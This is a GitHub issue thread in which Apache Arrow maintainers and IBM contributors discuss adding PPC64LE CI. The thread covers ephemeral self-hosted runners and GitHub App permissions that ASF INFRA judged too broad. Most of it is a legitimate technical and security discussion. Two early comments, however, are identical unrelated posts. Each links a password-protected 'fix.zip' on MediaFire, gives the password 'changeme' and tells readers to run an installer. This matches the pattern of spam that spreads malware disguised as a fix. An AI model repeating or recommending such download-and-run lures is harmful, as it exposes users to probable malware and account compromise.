### ISSUE TITLE
[CI][Python][C++] Support on Power Architecture

### ISSUE THREAD

**Issue by sandeepgupta12** [apache/arrow#43817]
### Describe the enhancement requested

**Description:**
We need to extend support for apache/arrow to the POWER/PPC64LE architecture.

**Background:**
	• We have forked the apache/arrow repository and have successfully generated and tested wheels for both C++ and Python using a self-hosted CI runner on an OSU PPC64LE machine. 
	• The changes in the forked repository include following changes:
		   1. Added a job for PPC64LE in .github/workflows/cpp.yaml and .github/workflows/python.yaml, along with corresponding updates to docker-compose.yaml.
		  2. Created new Dockerfiles for C++ and Python: ci/docker/ppc64le-cpp.dockerfile and ci/docker/ppc64le-python.dockerfile.
		  3. Added build and test scripts for Python: ci/scripts/ppc64le_python_build.sh and ci/scripts/ppc64le_python_test.sh.
      
• We would like to upstream these changes to enable CI for ppc64le arch using GHA self-hosted runner.

**Fork Information:**
	• Forked Repository:  https://github.com/sandeepgupta12/arrow

**Request:**
	• Support for PPC64LE: We are seeking support for the PPC64LE architecture for the apache/arrow project.
	• Creation of OSU VM: To facilitate further testing and CI integration, we request the creation of an OSU VM configured for PPC64LE. Below are the details where you can create the OSU VM- 
	URL- https://osuosl.org/services/powerdev/request_hosting/
	IBM Advocate- gerrit@us.ibm.com

**Details:**
The Open Source Lab (OSL) at Oregon State University (OSU), in partnership with IBM, provides access to IBM Power processor-based servers for developing and testing open source projects. The OSL offers following clusters:
	**OpenStack (non-GPU) Cluster:**
	• **Architecture**: Power little endian (LE) instances
	• **Virtualization:** Kernel-based virtual machine (KVM)
	• **Access:** Via Secure Shell (SSH) and/or through OpenStack's API and GUI interface
	• **Capabilities:** Ideal for functional development and continuous integration (CI) work. It supports a managed Jenkins service hosted on the cluster or as a node incorporated into an external CI/CD pipeline.
 
**Additional Information:**
	• We are prepared to provide any further details or assistance needed to support the PPC64LE architecture.
Please let us know if there are any specific requirements or steps needed to move forward with this request.

### Component(s)

C++, Python

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by raulcd** [comment]
Thanks for reviving this. Since we moved away from Travis we stopped testing with little endian.
I remember @kiszk discussing about using osuosl for s390x here: https://github.com/apache/arrow/pull/35374#issuecomment-1541882889
I am concerned about the security implications on managing those boxes. Is this done by OSL? Are the VMs ephemeral or are they long living? Do we have to ask ASF infra (@assignUser?)

**Comment by kiszk** [comment]
Yes, I talkwd about OSL. But, I recently changed my idea to use GHA self-hosted runner since I saw this article.
https://community.ibm.com/community/user/powerdeveloper/blogs/gerrit-huizenga/2024/03/06/github-actions-runner-for-ibm-power-and-linuxone

**Comment by assignUser** [comment]
I agree with @raulcd, we can not support any non-ephemeral VM runners due to security reasons, they are a much to big risk in a public repo.  This has been used to compromise major open-source repos before: https://www.legitsecurity.com/blog/github-pytorch-and-more-organizations-found-vulnerable-to-self-hosted-runner-attacks

I'd be happy to add power runners if they are ephemeral (-> vm get's destroyed after each job) which we currently have for arm runners using k8s: https://github.com/voltrondata-labs/gha-controller-infra

**Comment by kiszk** [comment]
@raulcd @assignUser Thank you for sharing useful information.

As far as I know, this self-hosted runner framework for ppc64le and s390x uses [ephemeral VM](https://github.com/ppc64le/gaplib?tab=readme-ov-file#self-hosted).

**Comment by assignUser** [comment]
@kiszk No I don't think it is, the ephemeral there is talking about the image and how it needs to be build with the runner token to work, at least that's how I read it. 

As the line where it starts the runner doesn't have any mechanism to kill the container and start a new one for a new job (as would be required for ephemeral runners). Which is what the controller is for, it starts a new container/runner for each job and removes the old one.

**Comment by anup-kodlekere** [comment]
@assignUser Hi! If ephemerality is the concern then we can set the config parameters to launch ephemeral LXD containers, that wouldn't be an issue. You would still need to follow the instructions in https://github.com/anup-kodlekere/gaplib, the only thing that changes is how the containers are deployed and managed. However, we haven't tested use-case before and would need to run some tests to ensure functional correctness. A simple systemd service running a python/bash script will act like a controller in this case, which will launch a clean LXD build environment (within the same VM host) for each new job.

**Comment by kiszk** [comment]
@anup-kodlekere Thanks, great to hear that. If changes in the instruction are prepared, I could try it for the arrow for s390x as a test.

**Comment by pitrou** [comment]
By the way, please add the Continuous Integration when label to CI-related tasks, so that we can find them using a search :-)

**Comment by raulcd** [comment]
A couple of issues have been identified lately around Big Endian architectures, those probably would have been found if we tested on s390x:
- https://github.com/apache/arrow/issues/44769
- https://github.com/apache/arrow/issues/44767

**Comment by pitrou** [comment]
> A couple of issues have been identified lately around Big Endian architectures, those probably would have been found if we tested on s390x:

This issue is about PPC64LE ("LE" for "little endian").

**Comment by sandeepgupta12** [comment]
Hi team,
I wanted to share how the ephemeral self-hosted runner solution works for ppc64le builds, inspired by the approach used for s390x in Pytorch. Here’s a detailed overview:
	**1. Infrastructure Setup:**
		○ A self-hosted runner is deployed on an OSU-provided VM specifically for the ppc64le architecture.
		○ The runner is configured to remain idle and is triggered only for specific events (e.g., commits to the main branch, pull requests affecting ppc64le-related code).
	**2. Ephemeral Runner Inside a Container:**
		○ The runner runs inside a container, ensuring complete isolation and consistency.
		**○ Key Behavior:**
			§ The runner is registered as an ephemeral runner in GitHub Actions.
			§ Once a job is triggered, the runner performs the task.
			§ After the job is completed, the container stops, the runner unregisters itself automatically, and the container is deleted.
			§ For subsequent jobs, a new container is created with a clean environment, avoiding any conflicts from previous runs.
			§ To manage the runner, the command systemctl enable --now actions-runner@$NAME ensures that the runner is started.
	**3. Workflow Integration:**
		○ A dedicated job is added to the workflow YAML to target the ppc64le architecture.
		○ The job utilizes Docker containers to maintain a clean and reproducible environment for building and testing.
	**4. Execution Flow:**
		○ When a relevant event occurs (e.g., a new commit or pull request), a GitHub webhook triggers the job.
		○ The ephemeral runner (inside the container) picks up the job, executes the build and tests, unregisters itself, and the container is deleted after completion.
		
This containerized ephemeral runner setup has proven effective for managing ppc64le builds and tests efficiently while ensuring scalability, isolation, and optimal resource utilization. If you have any questions or need more details, feel free to ask!

**Comment by sandeepgupta12** [comment]
Hi @assignUser @kiszk, 

We’d like to propose enabling the GitHub Actions app on this repository to allow CI jobs for the Power (ppc64le) architecture to run using GitHub-hosted runners.

The runners are provided by IBM and integrate easily with existing CI setups. Documentation is available here:
🔗 https://github.com/IBM/actionspz/tree/main/docs

We’re happy to assist with the setup and help resolve any issues as part of the open-source collaboration process.

Looking forward to your thoughts, and thank you for all your work on PyArrow!

**Comment by assignUser** [comment]
That sounds cool but the App will have to be reviewed and allowed by ASF infra, the main thing being the permissions. On a quick glance I could not find the required permissions.

If it needs contents/repo write it's an unsolvable blocker as infra will not allow third parties to have write access for provenance and security reasons.

**Comment by sandeepgupta12** [comment]
> That sounds cool but the App will have to be reviewed and allowed by ASF infra, the main thing being the permissions. On a quick glance I could not find the required permissions.
> 
> If it needs contents/repo write it's an unsolvable blocker as infra will not allow third parties to have write access for provenance and security reasons.

Thanks @assignUser  for the clarification!

No, the app does not require contents or repo write permissions. We've recently updated the required permission details in our FAQ here:
🔗 https://github.com/IBM/actionspz/blob/main/docs/FAQ.md

Regarding the ASF Infra app review process — could you please guide us on the appropriate steps or contacts for initiating that review? We’re happy to comply with any requirements to ensure alignment with ASF's security and provenance policies.

Looking forward to your input!

**Comment by kiszk** [comment]
I also think this is cool on little-endian.

While I proposed a similar idea for s390x (big-endian), [the response](https://lists.apache.org/thread/kjt75n1lmd8dmo1n70d9tp6k6553on5r) was not positive.

**Comment by sandeepgupta12** [comment]
> > That sounds cool but the App will have to be reviewed and allowed by ASF infra, the main thing being the permissions. On a quick glance I could not find the required permissions.
> > If it needs contents/repo write it's an unsolvable blocker as infra will not allow third parties to have write access for provenance and security reasons.
> 
> Thanks [@assignUser](https://github.com/assignUser) for the clarification!
> 
> No, the app does not require contents or repo write permissions. We've recently updated the required permission details in our FAQ here: 🔗 https://github.com/IBM/actionspz/blob/main/docs/FAQ.md
> 
> Regarding the ASF Infra app review process — could you please guide us on the appropriate steps or contacts for initiating that review? We’re happy to comply with any requirements to ensure alignment with ASF's security and provenance policies.
> 
> Looking forward to your input!

Hi @assignUser 

Just checking in — any update on this from your side?

We’re happy to assist with any additional steps required for ASF Infra to review the app permissions or initiate the process.

Thanks again!

**Comment by pitrou** [comment]
@sandeepgupta12 Are you willing to do the work required to keep those CI builds green? Adding CI jobs is one thing, but there needs to be someone motivated in looking after them and ensure they don't accumulate failures.

**Comment by sandeepgupta12** [comment]
> [@sandeepgupta12](https://github.com/sandeepgupta12) Are you willing to do the work required to keep those CI builds green? Adding CI jobs is one thing, but there needs to be someone motivated in looking after them and ensure they don't accumulate failures.

Yes, my team and I are happy to take responsibility for helping keep the ppc64le CI builds green. We'll monitor the jobs regularly and proactively handle any architecture-specific or infrastructure-related issues that arise.

Some failures — particularly those stemming from upstream changes or test ownership — may still require community support to resolve. We’ll collaborate as needed to keep the ppc64le builds healthy and stable.

For any GitHub Actions setup-related issues, feel free to open a ticket at [IBM/actionspz](https://github.com/IBM/actionspz), or we can do so if needed.

**Comment by pitrou** [comment]
> While I proposed a similar idea for s390x (big-endian), [the response](https://lists.apache.org/thread/kjt75n1lmd8dmo1n70d9tp6k6553on5r) was not positive.

Well, assuming you want to handle the maintenance workload to make and keep those CI builds green, it would certainly be ok to add them.

**Comment by sandeepgupta12** [comment]
@pitrou @kiszk @assignUser 

Yes, that’s exactly the plan. My team and I are prepared to handle the maintenance workload needed to keep the ppc64le CI builds green. We’ll monitor the jobs regularly and take care of any architecture-specific or infra-related issues.

Could you please let us know how you'd like us to proceed from here? We’d appreciate your guidance on the next steps — especially regarding enabling the GitHub Actions app so ppc64le workflows can run.

**Comment by kou** [comment]
I've opened an INFRA issue for this: https://issues.apache.org/jira/browse/INFRA-27034

(Sorry, @sandeepgupta12 may not be able to see the issue.)

**Comment by kou** [comment]
The answer from INFRA:

> It is nice to see IBM offering this, but their permission set is too broad, we cannot allow third party write access to administrative settings. "This app requires read access to metadata, read and write access to actions, administration, checks, and workflows for the repository selected for install. Additionally this GitHub app requires reading the User account email address for security reasons. " 

Can we reduce required permissions?

Or is there another approach?

**Comment by kou** [comment]
For example, we received donated AWS credits: https://lists.apache.org/thread/q33oofy2v3zpg9s9l8o0w68rmjr3ocsv "[Discuss] Using donated AWS credits for CI, benchmarking, etc"

If IBM donates something to Apache Software Foundation, INFRA may be able to setup self-hosted GitHub runners for POWER/PPC64LE.

**Comment by assignUser** [comment]
@sandeepgupta12 Regarding the app to authenticate, we use something like it to register runners on the org level. This does not require the 'administration' write permission. Maybe offering that as an option would work? I think infra would allow actions and workflow write access on the repo scope.

**Comment by sandeepgupta12** [comment]
> [@sandeepgupta12](https://github.com/sandeepgupta12) Regarding the app to authenticate, we use something like it to register runners on the org level. This does not require the 'administration' write permission. Maybe offering that as an option would work? I think infra would allow actions and workflow write access on the repo scope.

Thank you for the update! We're currently testing the same approach — using the GitHub App to register runners at the organization level, without requiring administration write permissions.

**Comment by sandeepgupta12** [comment]
@assignUser We have done more testing, but for our backend, the current set of permissions is required. We’ve experimented with reducing permissions and switching to organization-level runners, but it doesn't work with our current setup. At this time, we’re not planning to register the runners at the organization level and intend to retain the current permissions configuration.

**Comment by assignUser** [comment]
@sandeepgupta12 Well that's too bad, in that case we won't be able to use the runners given INFRA's restrictions. Thanks for investigating this and your initial offer!

**Comment by sandeepgupta12** [comment]
Thanks for the clarification, @assignUser !

We understand the INFRA constraints and appreciate your consideration. We’ll work on obtaining the required organization-level permissions and will reach back out once that’s in place.

Thanks again for your time and support!

**Comment by sandeepgupta12** [comment]
Hi @assignUser, 

I wanted to share an update from our side. Based on community input, we’ve improved how authentication tokens are generated for Organizations and have removed the dependency on repo:admin permissions. The GitHub App now uses organization-level self-hosted runner permissions, which should better align with INFRA security requirements.

Details on the updated permission model are available here:
https://github.com/IBM/actionspz/issues/72

Please let us know if this addresses the earlier concerns.

Thanks, and happy to discuss further.

**Comment by raulcd** [comment]
I've asked INFRA about the renewed permissions for the GitHub app on this JIRA ticket:
- https://issues.apache.org/jira/browse/INFRA-26198

where there were some discussions about ppc64le GitHub runners.

**Comment by sandeepgupta12** [comment]
@raulcd , Just checking if there are any updates on the JIRA ticket. Looking forward to your reply.

**Comment by raulcd** [comment]
@sandeepgupta12 no response so far, I've pinged infra again on the JIRA ticket.

**Comment by sandeepgupta12** [comment]
Hi @raulcd,

Just checking in—are there any updates from INFRA on this?

I don’t have direct access to the JIRA ticket, so following up here. Please let me know if any additional information is needed from my side.

Thanks!

**Comment by raulcd** [comment]
Unfortunately no. I've pinged more INFRA people on the ticket. Thanks for the reminder.

**Comment by raulcd** [comment]
I've been having some interaction with INFRA on this. It seems that we have to fill the details of what jobs / runners / number of minutes. With a template like:

==== BEGIN IBM TEMPLATE ====

**Please describe the project**

**URL for the project**

**Describe current CI/CD setup**
 
**Describe the primary use case for the GitHub Action Runner**
 
**Paste a link to the existing actions workflow file(s) or directory**
 
**Which jobs in your workflow directory do you plan to run?**

**How often do you plan on executing the runner?**

**How long do you expect the jobs to run?**

**What is the primary programming language for the project?**

**Please select desired hardware by entering an X in the leading square brackets**
 
- [ ] Power 9 (ppc64le)
- [ ] IBM Z / LinuxONE (s390x)

**Comment by sandeepgupta12** [comment]
Thanks @raulcd, Issue has been created- https://github.com/IBM/actionspz/issues/107.
I will follow up with IBM gha team to approve pyarrow and will start working on CI/CD changes for ppc64le.
